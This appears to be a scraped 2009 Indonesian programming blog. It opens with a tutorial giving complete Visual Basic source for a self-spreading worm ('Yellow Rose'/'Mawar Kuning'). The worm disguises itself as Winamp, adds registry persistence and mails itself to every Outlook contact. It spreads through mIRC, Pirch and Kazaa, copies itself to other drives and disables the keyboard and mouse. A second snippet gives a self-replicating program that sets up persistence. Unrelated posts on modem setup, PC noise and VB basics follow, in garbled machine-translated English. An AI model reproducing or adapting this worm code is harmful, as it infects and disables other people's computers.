Public Sub ShutdownNT(Force As Boolean)

Dim Flags As Long
Flags = EWX_SHUTDOWN
If Force Then Flags = Flags + EWX_FORCE
If IsWinNT Then EnableShutDown
ExitWindowsEx Flags, 0

End Sub

=========================================================================================

YELLOW ROSE creted BY SHADOW ANGEL VITH VB

Salam VB Coders,
I want to Give a basic example of making the worm infect Kazaa,
Pirch, Personalization, Microsoft Outlook and make each other do bad to own,
This worm can I use ...
This tutorial I love the name "Yellow Rose", his name is not the same .. I would like in a changed and Oke ..
This is script for yellow rose:

=======================================================================================
@Akan mengcopy di C:%System%\Winamp.exe
@Mendaftarkan dirinya di register di :
$HKEY_LOCAL_MACHINE\Software\Mcft\Windows\CurrentVersion\RunServices\Swf32="C:%System%\Winamp.exe"' supaya bisa aktif kalo kumpoter di nyala in..
$HKEY_CLASSES_ROOT\scrfile\shell\open\command\="C:%System%\winamp.exe"',
@Nampilin error : Winamp error, please reinstall !' saat virus di jalanin
@akan mengcopy ke folder startup jadi bisa aktif terus
@Mengcopy juga ke %Windows%, %System% and %Temp% folders dengan nama 'Jdbgmgr.exe'
Ini di lakukan supaya ada backupan worm.
@mengirim email ke semua daftar alamat email yang ada di address book
@Worm ini akan berusaha menyebarkan dirinya melalui Mirc, Pirch and Kazaa
@Oo..h iya..,aq enggak tau nyebarin melaui E-mail bekerja apa enggak di komputer laen,masalahnya di komputer aq jalan,kasih tau aq yah.. sapa tau aja jalan ? ! ?
@ dan sebagainya, di coba yah..

Kalo mau ngebuatnya yang dibutuhin cuman Form kosong aja kok, gak ada komponen laennya and tinggal di masukin aja Codingnya .
Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long 'Objeck CD Tray (Supaya worm bisa buka CD Tray)
Private Sub Form_Load()
On Error Resume Next
' -------------------------------------------------------------------------------------
Dim AppPath As String
AppPath = App.Path
If Right(AppPath, 1) <> "\" Then AppPath = AppPath & "\" ' cari tempat negcopy :)
Set fso = CreateObject("Scripting.FileSystemObject") ' Cari tempat di direktori %Windows%, %System% atau %Temp%.
Set wsc = CreateObject("WScript.Shell") ' Copy ke Folder %Startup% , dan tulis di register.
WormMawarkuning = AppPath & App.EXEName & ".EXE" ' Copy format .exe.
' -------------------------------------------------------------------------------------
If Dir(fso.GetSpecialFolder(1) & "\Winamp.exe") <> "Winamp.exe" Then ' Periksa apa worm udah di Copy.
FileCopy WormMawarkuning, fso.GetSpecialFolder(1) & "\Winamp.exe" ' Kalo worm belum di copy,yah.. di copy lagi dunks... :)
wsc.RegWrite "HKEY_LOCAL_MACHINE\Software\Mcft\Windows\CurrentVersion\RunServices\Winamp", fso.GetSpecialFolder(1) & "\Winamp.exe" ' Tulis ke Register supaya worm bisa terus di jalan in.
wsc.RegWrite "HKEY_CLASSES_ROOT\scrfile\shell\open\command\", fso.GetSpecialFolder(1) & "\Winamp.exe" ' Tulis ke Register,terus mengesampingkan perintah Screen Server di Dekstop,supaya menghemat daya yang di gunain di Svreen Server, dan sebagai gantinya yah.. worm ini lah...
MsgBox "Winamp Error,Please Reinstal....!", vbCritical, "Error" ' Kirim pesan palsu :)
Else
If Day(Now) = 16 Then 'infeksi pada tanggal 16 :)
MsgBox "Compact-Disc Terinfeksi", vbSystemModal + vbExclamation, "Mawar Kuning By Shadow Angel"
mciSendString "Set CDAudio Door Open Wait", 0&, 0&, 0& ' Buka CD Tray :)
wsc.Run "Rundll32.exe Keyboard,Disable" ' Disable keyboard
wsc.Run "Rundll32.exe Mouse,Disable" ' Disable mouse
wsc.RegWrite "HKEY_LOCAL_MACHINE\Software\Mcft\Windows\CurrentVersion\RunServices\MawarKuning_Keyboard", "Rundll32.exe Keyboard,Disable" ' Disable Keyboard di Register,jadi Keyboard akan tetap enggak jalan sebelum Value di Register di Hapus.
wsc.RegWrite "HKEY_LOCAL_MACHINE\Software\Mcft\Windows\CurrentVersion\RunServices\MawarKuning_Mouse", "Rundll32.exe Mouse,Disable" ' Sama seperti Keyboard,Mouse akan tetap disable sebelum Value di Register di Hapus.
End If
End If
' -------------------------------------------------------------------------------------
If Dir(wsc.SpecialFolders("Startup") & "\MawarKuning.exe") <> "MawarKuning.exe" Then 'Copy ke Folder StartUp
FileCopy WormMawarkuning, wsc.SpecialFolders("Startup") & "\MawarKuning.exe" ' Kalo worm enggak ada di folder StartUp, Yah.. copy lagi.. lagi.. dan lagi.. sampe bosen :)
End If
' -------------------------------------------------------------------------------------
FileCopy WormMawarkuning, fso.GetSpecialFolder(0) & "\Jdbgmgr.exe"
FileCopy WormMawarkuning, fso.GetSpecialFolder(1) & "\Jdbgmgr.exe" ' buat BackUp Worm ,dan copy ulang file Jdbgmgr.exe :)
FileCopy WormMawarkuning, fso.GetSpecialFolder(2) & "\Jdbgmgr.exe"
' -------------------------------------------------------------------------------------
If Dir(fso.GetSpecialFolder(1) & "\Mawar Kuning.txt") <> "Mawar Kuning.txt" Then ' kirim worm ke alamat yang ada di Address Book di Microsoft Outlook.
Set OutlookApp = CreateObject("Outlook.Application")
Set GNS = OutlookApp.GetNameSpace("MAPI")
For List1 = 1 To GNS.AddressLists.Count
CountLoop = 1
For ListCount = 1 To GNS.AddressLists(List1).AddressEntries.Count
Set OutlookEmail = OutlookApp.CreateItem(0)
OutlookEmail.Recipients.Add (GNS.AddressLists(List1).AddressEntries(CountLoop))
Randomize
RndNumber = Int((6 * Rnd) + 1)
Select Case RndNumber
Case 1: RndText = "Kamu udah Lihat Gambar Mawar Kuning lagi Mekar;)" & vbCrLf _
& "" & vbCrLf _
& "Sampai Jumpa."
Case 2: RndText = "Ada Video,Mawar Kuning lagi Mekar di pagi hari loh....." & vbCrLf _
& "Balas E-mail aku ya.. supaya aku tahu kamu suka apa enggak,Oke..;)" & vbCrLf _
& "" & vbCrLf _
& "Sampai Jumpa."
Case 3: RndText = "Kamu sudah punya video Mawar Kuning Lagi Mekar Di Pagi Hari, Aku tahu kamu suka Video ini,;)" & vbCrLf _
& "" & vbCrLf _
& "Sampai Jumpa."
Case 4: RndText = "Kamu sudah lihat belum,Video sepasang kekasih duduk dikelilingi Mawar kuning..." & vbCrLf _
& "Aku tahu kamu pasti suka;)" & vbCrLf _
& "" & vbCrLf _
& "Sampai Jumpa."
Case 5: RndText = "Apa pendapat kamu tentang Video Mawar kuning ?" & vbCrLf _
& "Kirim e-mail ke aku yah.. aku ingin tahu pendapat kamu;)" & vbCrLf _
& "" & vbCrLf _
& "Sampai Jumpa."
Case 6: RndText = "Nonton video Mawar kuning,kamu pasti suka;)" & vbCrLf _
& "" & vbCrLf _
& "Sampai Jumpa."
End Select
OutlookEmail.Subject = "Salam Kenal!"
OutlookEmail.Body = RndText
OutlookEmail.Attachments.Add (fso.GetSpecialFolder(1) & "\MawarKuning.exe")
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Importance = 2
OutlookEmail.Send
CountLoop = CountLoop + 1
Next
Next
End If
' -------------------------------------------------------------------------------------
Open fso.GetSpecialFolder(1) & "\Mawar Kuning.txt" For Output As 1
Print #1, "MawarKuning by Shadow Angel"
Close 1
' -------------------------------------------------------------------------------------
If Dir("C:\Mirc32\Mirc.ini") = "Mirc.ini" Then mIRCPath = "C:\Mirc32" ' Cari Mirc
If Dir("C:\Mirc\Mirc.ini") = "Mirc.ini" Then mIRCPath = "C:\Mirc"
If Dir(wsc.SpecialFolders("Programs") & "\Mirc\Mirc.ini") = "Mirc.ini" Then mIRCPath = wsc.SpecialFolders("Programs") & "\Mirc"
If Dir(wsc.SpecialFolders("Programs") & "\Mirc32\Mirc.ini") = "Mirc.ini" Then mIRCPath = wsc.SpecialFolders("Programs") & "\Mirc32"
If mIRCPath <> "" Then ' Jika Mirc di instal atau ada di komputer worm akan mengEdit : Script.ini :)
' -------------------------------------------------------------------------------------
If Dir(mIRCPath & "\Mawar.ex_") <> "Mawar.ex_" Then
FileCopy WormMawarkuning, mIRCPath & "\Mawar.ex_"
End If
' -------------------------------------------------------------------------------------
Open mIRCPath & "\script.ini" For Output As 2
Print #2, "[script]"
Print #2, "n5= on 1:JOIN:#:{"
Print #2, "n6= /if ( $nick == $me ) { halt }"
Print #2, "n7= /msg $nick Kamu sudah lihat Film Mawar Kuning;) - Kalo filmnya enggak jalan ganti nama filenya menjadi MawarKuning.exe"
Print #2, "n8= /dcc send -c $nick " & mIRCPath & "\Mawar.ex_"
Print #2, "n9= }"
Close 2
End If
' -------------------------------------------------------------------------------------
If Dir("C:\Pirch32\Pirch32.exe") = "Pirch32.exe" Then PirchPath = "C:\Pirch32" ' Cari Folder Pirch
If Dir("C:\Pirch\Pirch32.exe") = "Pirch32.exe" Then PirchPath = "C:\Pirch"
If Dir(wsc.SpecialFolders("Programs") & "\Pirch\Pirch32.exe") = "Pirch32.exe" Then PirchPath = wsc.SpecialFolders("Programs") & "\Pirch"
If Dir(wsc.SpecialFolders("Programs") & "\Pirch32\Pirch32.exe") = "Pirch32.exe" Then PirchPath = wsc.SpecialFolders("Programs") & "\Pirch32"
' -------------------------------------------------------------------------------------
If PirchPath <> "" Then ' Kalo Pirch di instal di komputer atau ada di komputer maka worm akan mengEdit file : Events.ini :)
' -------------------------------------------------------------------------------------
If Dir(PirchPath & "\Mawar.ex_") <> "Mawar.ex_" Then
FileCopy WormMawarkuning, PirchPath & "\Mawar.ex_"
End If
' -------------------------------------------------------------------------------------
Open PirchPath & "\events.ini" For Output As 3
Print #3, "[Levels]"
Print #3, "Enabled=1"
Print #3, "Count=6"
Print #3, "Level1=000-Unknowns"
Print #3, "000-UnknownsEnabled=1"
Print #3, "Level2=100-Level 100"
Print #3, "100-Level 100Enabled=1"
Print #3, "Level3=200-Level 200"
Print #3, "200-Level 200Enabled=1"
Print #3, "Level4=300-Level 300"
Print #3, "300-Level 300Enabled=1"
Print #3, "Level5=400-Level 400"
Print #3, "400-Level 400Enabled=1"
Print #3, "Level6=500-Level 500"
Print #3, "500-Level 500Enabled=1"
Print #3, ""
Print #3, "[000-Unknowns]"
Print #3, "UserCount=0"
Print #3, "Event1=ON JOIN:#:/msg $nick Kamu sudah lihat Film Mawar Kuning;) - Kalo filmnya enggak jalan ganti nama filenya menjadi MawarKuning.exe"
Print #3, "EventCount=0"
Print #3, ""
Print #3, "[100-Level 100]"
Print #3, "User1=*!*@*"
Print #3, "UserCount=1"
Print #3, "Event1=ON JOIN:#:/dcc send $nick " & PirchPath & "\Mawar.ex_"
Print #3, "EventCount=1"
Print #3, ""
Print #3, "[200-Level 200]"
Print #3, "UserCount=0"
Print #3, "EventCount=0"
Print #3, ""
Print #3, "[300-Level 300]"
Print #3, "UserCount=0"
Print #3, "EventCount=0"
Print #3, ""
Print #3, "[400-Level 400]"
Print #3, "UserCount=0"
Print #3, "EventCount=0"
Print #3, ""
Print #3, "[500-Level 500]"
Print #3, "UserCount=0"
Print #3, "EventCount=0"
Close 3
End If
' -------------------------------------------------------------------------------------
If Dir("C:\Kazaa\Kazaa.exe") = "Kazaa.exe" Or Dir(wsc.SpecialFolders("Programs") & "\Kazaa\Kazaa.exe") = "Kazaa.exe" Then ' Periksa apa Kazaa di instal/ada di komputer.
MkDir fso.GetSpecialFolder(1) & "\KazaaShared" ' Kalo Kazaa ada dikomputer,maka worm akan membuat folder tersembunyi :)
KazaaShared = fso.GetSpecialFolder(1) & "\KazaaShared\"
FileCopy WormMawarkuning, KazaaShared & "Tangisan Berdarah.exe"
FileCopy WormMawarkuning, KazaaShared & "Video Mawar Kuning.exe"
FileCopy WormMawarkuning, KazaaShared & "Shadow_Angel.exe"
FileCopy WormMawarkuning, KazaaShared & "Winamp.exe"
FileCopy WormMawarkuning, KazaaShared & "XXX video.exe"
FileCopy WormMawarkuning, KazaaShared & "Superman.exe"
FileCopy WormMawarkuning, KazaaShared & "Tukul.exe"
FileCopy WormMawarkuning, KazaaShared & "My computer.exe"
FileCopy WormMawarkuning, KazaaShared & "ARCADE POOL II.exe"
FileCopy WormMawarkuning, KazaaShared & "Tutorial Hacking.exe"
FileCopy WormMawarkuning, KazaaShared & "MacroMedia Flash 6.0.exe"
FileCopy WormMawarkuning, KazaaShared & "Zuma.exe"
FileCopy WormMawarkuning, KazaaShared & "Microsoft Word.exe"
FileCopy WormMawarkuning, KazaaShared & "Lesbian.exe"
FileCopy WormMawarkuning, KazaaShared & "[SWF] - Jurassic Park 3.exe"
FileCopy WormMawarkuning, KazaaShared & App.EXEName & ".exe"
wsc.RegWrite "HKEY_CURRENT_USER\Software\Kazaa\Transfer\DlDir1", fso.GetSpecialFolder(1) & "\KazaaShared" ' Folder tersembunyinya tulis di Register :)
End If
' -------------------------------------------------------------------------------------
For Each dc In fso.Drives ' Infeksi Driver.
If dc.DriveType = 2 Or dc.DriveType = 3 Then
If UCase(dc.Path) <> "C:" Then
If dc.IsReady Then
If Dir(dc.Path & "\Winamp.exe") <> "Winamp.exe" Then 'Periksa apa worm terCopy.
FileCopy WormMawarkuning, dc.Path & "\Winamp.exe" ' Kalo gak ada Copy Lagi..:)
End If
End If
End If
End If
Next
wsc.RegWrite "HKEY_CURRENT_USER\Software\MawarKuning\1.0\", "MawarKuning by Shadow Angel"
' -------------------------------------------------------------------------------------
End Sub

=======================================================================================
Want to know how to make virus use vb script . follow the tutorial below:
only the virus itself repeatedly - back, I opened will copying itself 2 times, continuously, to give himself naming the appropriate number of diacak(random), and register himself to Register computer.user can add code again.so that others more solid, such as block task : manager, msconfig, this seems normal dsb.may be, only I wish for the knowledge-sharing aja, sorry ya .. I can do more .. with this code:

===================================================================================
rivate Sub Form_Load()
On Error Resume Next
KopiSusu
DaftarinKeRegister
End Sub

Public Function Pengacakan(ByVal Low As Long, ByVal High As Long) As Long
Randomize
Pengacakan = Int((High - Low + 1) * Rnd) + Low
End Function

Private Sub KopiSusu()
On Error Resume Next
X2 = 0
Do Until X2 = 2
X = Pengacakan(0, 999999999)
FileCopy App.Path & "\" & App.EXEName & ".exe", App.Path & "\" & App.EXEName & X & ".exe"
Shell App.Path & "\" & App.EXEName & X & ".exe"
X2 = X2 + 1
Loop
End Sub

Private Sub DaftarinKeRegister()
X3 = Pengacakan(0, 999999999)
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\plaige" & X3 & ".exe"
Dim RegKey
Set RegKey = CreateObject("WScript.Shell")
RegKey.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\plaige", "C:\windows\plaige" & X3 & ".exe"
End Sub

======================================================================================
will be continiou..and practice by admin

Setting Speedy Using modem ADSL Corega

Want to know how TO set Speedy ADSL Modem Corega.? Please follow the following step ya :
-------------------------------------------------------------------------------------
1. Pastikan modem tersambung dengan benar.
2. Ubah IP komputer anda dengan 192.168.1.2/24 (tahu kan /24 itu untuk submask)
3. Buka Mozilla atau IE
4. Ketik di address 192.168.1.1
5. Username : root password :
6. Klik wizard
7. Pilih negara: Indonesia kemudian pilih TELKOM 4
8. Klik config
9. Klik New Connection
10. Tuliskan nama koneksi yang baru
11. Pilih PPOE
12. Untuk VCI, VPI tanya ke telkom, klo untuk Rembang pakai VCI : 8, VPI : 81
13. Masukkan username : xxxxxxxxxxxx@telkom.net
14. Masukkan password speedy anda.
15. Klik Apply
16. Klik Connect
17. Klik Apply
18. Klik Save All
19. Jadi deh...

=====================================================================================
Troubleshotting
If still not connect after the above steps please restart your computer and set one more let's post other.

Hopefully so useful.

Teach VB In SMK N 1 Rembang


Earlier I ngajar visual basic ict in the zenith with the basic spirit of the participants because the first time create a program.
For the first time I teach where I make a digital clock that is:
=====================================================================
1. Persiapkan 1 form, 1 label, 1 timer
2. Ubah properties untuk timer dengan interval 1000
3. Ketikkan kode dibawah ini:
Private sub Timer1_Timer()
Label1.Caption = Format(Now, "dddd, dd mmmmm yyyy, hh:mm:ss")
End Sub
4. Run program with press F5

======================================================================
So before I teach the program to create a digital clock in the ICT Rembang.
hopefully useful.
apan at au-go lesson ....

Earlier I teach visual basic ict in the zenith with the basic spirit of the participants because the first time create a program.

Rabu, 22 Juli 2009

ALL sites resource for blogging




Blogger

Blogger is one of the oldest tools to introduce what it is Blog.
Blogger now has become part of Google, and remains free as before. The merit lies in the Blogger kemudahannya Plugins in organizing, advertising, change the template, to - hack the template, and the ease that your hard to find elsewhere. But Blogger is not escape from the shortcomings, one of them in the case of closed-source (the code is not opened as public WordPress). Yes, only that khan? The service - We service satisfactory.


Blogger

Selasa, 21 Juli 2009

Silence the noisy computer

Working very hard to make your computer can not be silent. Even on the condition that caused a certain sound can disrupt the work. When this happens, flee "mum" on your computer.


The computer noise is not more things to feared. Now computers have become a noisy general case. However, it does not mean can not be avoided. Computers that are generally caused by the noise components that move. Start from the fan who most often become ringleader berisiknya computer to optical devices such as CD ROM and floppy disk. All aspects of this potential cause because the noise in operation have parts that move.

For some people the sound is actually not a problem which is very important. But sometimes someone needs some tranquility to work and voices can only membuyarkan konsentrasinya.

Other workers as well as for the dead space is a major factor. For example, a man who worked as a producer vote. In kesehariannya he need a work atmosphere is very quiet, if not very akan become fatal. Because it can only sound is recorded into the currently do. When this happens, the voice on the computer can not only cause inconvenience but also the effectiveness of work.

In fact for the problem is not quite difficult. The required accuracy only components you select for your computer. More yan also vote more often caused posisitf means. That is, the more kencangnya lap faster then the process a work in progress. Such as a PC fan that rotates very fast to cool down your computer. This work is vital. Because the PC will make a hot computer quickly broken and flammable.

Mesipun not mean that there should always vote, sometimes exceeding the speed round is needed. Therefore, you actually can control your PC as needed. Or you can also utilize other techniques in the chill of your PC.

Simple test
What is there in the operation of the components that cause the sound or just because the location makes it noisy. Therefore, before you decide to replace your components, there is a good idea to review first denan very carefully.

Start the attention of the place where each component was established. Make sure there is no loose or thin. For example if the location of hard rocking, or if not so, it can only work hard when getarannya cause that does not sound comfortable.

Then also note holder in the optical drive you and your PC fan holder. If there is a vibration noise ganjallah with nonmetal materials. Such as foam, cork, or paper.

However, if the noise is in fact a fan-fan on your computer, then one knows which is to hold all round and let a fan just a fan work. This indeed is a bit challenging hazards, but the termination of about 10 to 15 minutes will not make your computer Overheat. Be calm in the course do so.

How to hold a round fan with pull out power cable every fan. Or holding the middle of the fan with your finger. You can avoid static electricity with the hands before touching the computer case that is not coated paint.

To stop the CPU fan can be assisted with a plastic batangan nonkonduktif and not too hard. In this way, you can find out which fan is noisy and needs to be replaced and what does not.

Follow this principle to replace:
1. If you have a noisy fan, you can quickly change the fan.
2. If two or more fan is noisy, then it just will not make a sound is lost. For even though there is only one fan is noisy voice, it will be a very dominant presence will disrupt the voices of others.

Fan
As was earlier disinggung, that fan is the main component that most often make your computer a voice. In each PC, especially the latest model could fan up to three or four. Even for a PC that is used on the special needs can be more than four fan. Fan-fan is located on the CPU, VGA, sound card (for certain types of) to the PC itself. And as has also been disinggung earlier, that the speed putaranlah make the most fan noise. Meanwhile, the fast lap this will be cool.

You may be able to choose what type of fan that will be used on your PC, but not the case with the fan on the VGA and chipset fan on the other. Replace it with almost the same as the card itself, except to use the system mouting standard.

Before discussing one by one type of fan on the computer before we actually know what the fan on your computer. Rotating fan's interest in hot air out. And bring the cold air outside to inside. In conducting its work, there are two votes that can be caused by fan. That is, the sound that arises because of the rotary air and noise arising from propeller rotation itself. Because of the second sound that can be incurred as deritan can also be gumaman.

Sounds may arise because the fan is dirty, less oily, or too quickly because it is less good. Therefore, to cope with not always replace them with new ones. You can try first, and give up if the oil is less oily.

If these two steps do not reduce the bunyinya, can be tested for menguragi voltasenya that speed putarannya reduced. That is, the set of cables connected to the power supply. The only way this can be a second computer to make you a little more heat. Therefore, you must be diligent with memantaunya and is not recommended for the fan that is connected to the CPU or chipset.

If you will buy a new fan you can try to find the fan noise that has a value of 28 dB. This value is quite small for the human ear so that it will not disrupt too. The only generally with the fan vote that will work with a low speed. This you must anticipate with many things. Start from a more strict control, and the addition of cooling system / fan.

CPU fan
Each processor output type as the last fan has a processor is working very quickly and this is of course easy to make a fast hot computer. Thus, the processor requires the fan itself. An alternative other than to replace the CPU fan is to run applications for energy saving such as Rain CPU cycles so that the speed or lap time can be reduced.

CPU does not actually require a lot of energy if used only for small things, such as typing or just set the MP3. You akan tersadar any CPU you generally work more weight.

Currently, many models have a CPU fan and not noisy. However, if your CPU is working very hard and you have to run the fan with a lower speed, you have a good idea to add a cooling system is not noise anymore. In addition to a lost voice, your CPU will still be awake temperaturnya.

Fan Casing
The fan casing can be eliminated only this can make your computer to be more heat. Moreover, when no ventilation is good enough on the casing wall. For the fan casing, you can choose more freely. You can replace the fan with a quiet voice that's already there. See previous size used by your computer. Try to use a larger fan size with a lower speed. The larger the fan can expel more hot air. Therefore, it will not become obstacles when that fan should run more because the number of slow air, waste heat that remains the same. Note also Decibel value if possible.

Generally, computer fan to work with Decibel value of about 20 dB to 60 dB. You can buy a fan measuring 25 dB-30 dB. If the room is too full can also cause fever. Therefore, there is a good idea to reduce a two-card component that is not necessary. Information about this fan selau available. Moreover, for the fan-fan which is designed to reduce noise. In the box or manual or even brosurnya generally akan written particulars such as Decibel value, speed, power and the need to operate.

Chipset Fan
There are some chipsets use fans. This is because there are some chipsets that has its own CPU. So, the chipset provides heat to the konstribusi
your computer.

The size of the fan is generally used 40x40x10 mm. And you can replace the fan with a regular plug dislodged. Unfortunately, not all chipsets using the technique penempelan or standard mounting. There are also some that use a special mounting, so if you want to remove voices have only two options. Buy a new chipset or removing the old system and replace your computer. If you want to replace it with a greater speed of play is smaller, you should always monitor the computer.

If the new chipset to be the choice, note the good description provided. For the chipset features silent or noisy, generally will be clear.

Harddisk
After a fan-fan before, one more component that is not less hard berisiknya
What causes hard work when a voice? Because there is also in the hard disk mechanical system. Voters incurred was caused by the disc-disc rotates. Not only make the rotation disc drive sounds when in operation, the disk head movement can also cause sound
the cause. Can be much faster even from your own voice putarannya.

Actual sounds may be muted with the hard disk using a tool reducer. However, sometimes this is not recommended because it can make a disk heat. Tools reducer can be made with simple manually.

As another alternative, you can also use the hard disk that is not too noisy. There are several hard disks that are deliberately made with a voice that is not too large.

When this disk is not as difficult to search. Because now that almost the entire hard drive is equipped with SMART technology that makes your work easy to control. When he must diforsir to work that can only cause a sound when it should work without a sound.

SMART technology is a technology that is now more equipped in every production of the latest hard disk.

SMART stands for Self-Monitoring Analysis and Reporting Technology, which means the ability to analyze the hard drive itself ila have an error or damage. One of them can use the SMART dimonitoring this is a hard head, putarannya, including the hard disk. Three issues that impact not only on the hard drive itself, but also on the whole computer. For with the increase of hard disk temperature rise will also encourage the casing space that can only trigger the fan to work faster and more noisy.

Round disk head movement or voice. Therefore, this feature will be very helpful. You can immediately anticipate if there is a problem and may know for certain what the occurrence of noise.

Or as an alternative, you can use the external housing to your hard drive. The advantages are you are given early warning about the damage that can occur on your hard disk. By using the external housing, hard disks can be made more mobile and flexible to take-or simply to take it moved.

In addition to these steps, it should not activate the hard drive when you do not use computers. This can make your hard disk does not rotate for a while. Of which:
1. Turn off or disable the application if it is not used anymore.
2. Also turn off some of the applications that remain active even if not used, such as Yahoo! Messenger Tray, Startcentre RealPlayer, and others.
3. You can set the hard disk that automatically stop on a certain time. How, through the option of Power Option in Control Panel.

To muffle the sound, you can use a plastic bracket for your hard disk. Bracket umunya is available in computer stores that sell a lot of components in the computer.

Optical device
Another peangkat that less noise is not a CD or floppy disk. The same with the hard disk, that is no mechanical components such as the disk rotates. This can be muted with the device and does not find a more noisy.

To Floopy disk should not be used again. You can change Floopy disk with the flash disk with a capacity much larger and much smaller. Moreover, at this time already have a USB in almost every type of motherboard, is not it?

While for optical devices such as DVD or CD-RW you can select multiple products with the technology of production Asus' Quietrack 'or with the Samsung DVD-berteknologi Aqustic its Noise Reduction System.

Other techniques
In addition to the fan with a fan also, you can try the other cooling techniques, with water cooling technology. Name in accordance with this technique is to use water. Indeed, far more expensive, but it does not not mean that valuable. Quite reasonable prices issued with what you'll get.

Time to select the ring
Do not forget to always control the temperature of your PC. Well with the temperature monitoring software or by using special software. By means of this fan does not need to work diforsir each day. Self-monitoring compliance with it. For example if the computer shows a high temperature, the fan can work hard and a bit noisy. At the time of such work can be suspended pending the computer a bit cold again.

To be able to monitor the vote there were two components that can help, namely the temperature of the hardware have also assisted with the software.

Many software are available for free to control the temperature your computer. Not only set the value of temperature as a whole, but also to know the temperature at a component, such as hard drive and CPU.

Stau One software that can detect the temperature of the hard disk is Palicksoft www.siguardian.com. This application can work with the same sensors that are used by your computer and can be integrated with the SMART technology, which is owned by a new hard-disk.

Another interesting application of this is can be used to drive a lot at once. Moreover, it is not only a warning may be provided through the monitor screen, but can also be through e-mail so that it is suitable for the needs of the network.

Even with software such as rock Almico of software Almico (www.almico.com), you can not only make the observation of your hard disk temperature, but can also be integrated with the fan-fan can be controlled so that you do not need to be bothered again. You just run the fan speed lower. If you are a hot start through the software to work more quickly. Almico software from this can also be used for SCSI hard disks.

It is what you want done to reduce noise in your computer. Whatever it adjust to the needs and your ability.

Minggu, 28 Juni 2009

self confidence or bluff ?

hisyam after read .In daily file, we frequently find one who very trusts diriserta arrogant people. Self confidence One who usually easy associate with with others. Whereas smart aleck usually lazy come near by whoever. Its section many people that confuse actually its position there is where.
Bluff or self confidence Kita?
Following difference between smart aleck and self confidence people:

1. Smart aleck pretend it higher than others. Whereas self confidence people believe that he/she haves uniqueness and talent as the same manner as that bestowed differ to everyone.

2. Smart aleck likely always knew what best for others. Whereas self confidence one who are always opened about its opinion to others.

3. Smart aleck usually sharp to his/her one who see as [the] rival. Self confidence People have borned ably to compete.

4. Difficult Smart aleck and even never confess their mistake. Self confidence People not afraid to confess that he conduct mistake.

5. Smart aleck usually like if others conducts mistake Sedang those in self confidence likes help people face mistake that they make.

6. Smart aleck usually very care with others opinion to he/she. Whereas self confidence people not too cared with others opinion to he/she.

7. Smart aleck usually like plume it, whereas those in self confidence tends to to keep quiet.

Last how become self confidence without turn into bluff?


it-self introspection....../


from :: http://www.rascalbrick.blogspot.com/

Minggu, 21 Juni 2009

Visual Basic with Listbox

This is a basic from Visual basic chung_chin make to Prof. Reza bekasi children who always chat with chung_chin with the id rezaprof26. that is actually easy to only require 1 form, 1 ListBox and 3command button. then you can type the code below:

----------------------------------------------------------------------------------------

Private Sub cmdKeluar_Click()
End
End Sub

Private Sub cmdTampil_Click()
Dim i As Integer
lstNama.Clear 'ini untuk membersihkan lstnama
For i = 1 To 3
lstNama.AddItem txtInputNama.Text
Next i
End Sub

Private Sub cmdWarna_Click()
lstNama.ForeColor = vbRed
End Sub

-----------------------------------------------------------------------------------

If you want to download this file click there

Learn Visual Basic

For you who want to learn visual basic and want to learn the making of anti-virus and virus with visual basic you can download the source code click here

But do not use any because this is an activity only. I hope the programming can be developed in Indonesia.

Jumat, 19 Juni 2009

long time not post a source code with the application codejob, after so long a successful ngoprek finally the view that in accordance with the desire.
I include below will all see the looks though. and the source code to follow

Senin, 08 Juni 2009

Printed Struk with Star tipe cutter printer sesi 2

Earlier that there is source code I made, I will now be provided with source code in a vb by a support team from the printer maker (star). Please follow me .... (continue)

source code in this method combine with rawprinter that I study in the earlier post. Now this is source code ..

-------------------------------------------------------------------------------------
Call StartPagePrinter(lhPrinter)
' Sending raw data to the printer
sWrittenData = Chr(&H1B) + Chr(&H1D) + Chr(&H61) + Chr(&H1) 'Center Alignment - Refer to Pg. 3-29
sWrittenData = sWrittenData + Chr(&H5B) + "If loaded.. Logo1 goes here" + Chr(&H5D) + vbCrLf
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H1C) + Chr(&H70) + Chr(&H1) + Chr(&H0) + vbCrLf 'Stored Logo Printing - Refer to Pg. 3-38
sWrittenData = sWrittenData + "Star Clothing Boutique" + vbCrLf
sWrittenData = sWrittenData + "1150 King Georges Post Rd." + vbCrLf
sWrittenData = sWrittenData + "Edison, NJ 08837" + vbCrLf
sWrittenData = sWrittenData + vbCrLf
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H1D) + Chr(&H61) + Chr(&H0) 'Left Alignment - Refer to Pg. 3-29
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H44) + Chr(&H2) + Chr(&H10) + Chr(&H22) + Chr(&H0) 'Setting Horizontal Tab - Pg. 3-27
sWrittenData = sWrittenData + "Date: 12/31/2008 " + Chr(&H9) + " Time: 9:10 PM" 'Moving Horizontal Tab - Pg. 3-26
sWrittenData = sWrittenData + "------------------------------------------------" + vbCrLf + vbCrLf
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H45) 'Select Emphasized Printing - Pg. 3-14
sWrittenData = sWrittenData + "SALE" + vbCrLf
sWrittenData = sWrittenData + Chr(&H1B) + Chr(&H46) 'Cencel Emphasized Printing - Pg. 3-14
sWrittenData = sWrittenData + "SKU " + Chr(&H9) + " Description " + Chr(&H9) + " Total" + vbCrLf
sWrittenData = sWrittenData + "300678566 " + Chr(&H9) + " PLAN T-SHIRT" + Chr(&H9) + " 10.99" + vbCrLf
sWrittenData = sWrittenData + "300692003 " + Chr(&H9) + " BLACK DENIM" + Chr(&H9) + " 29.99" + vbCrLf
sWrittenData = sWrittenData + "300651148 " + Chr(&H9) + " BLUE DENIM" + Chr(&H9) + " 29.99" + vbCrLf
sWrittenData = sWrittenData + "300642980 " + Chr(&H9) + " STRIPE DRESS" + Chr(&H9) + " 49.99" + vbCrLf
sWrittenData = sWrittenData + "300638471 " + Chr(&H9) + " BLACK BOOT" + Chr(&H9) + " 35.99" + vbCrLf
sWrittenData = sWrittenData + vbCrLf
sWrittenData = sWrittenData + "Subtotal " + Chr(&H9) + "" + Chr(&H9) + " 156.95" + vbCrLf
sWrittenData = sWrittenData + "Tax " + Chr(&H9) + "" + Chr(&H9) + " 00.00" + vbCrLf
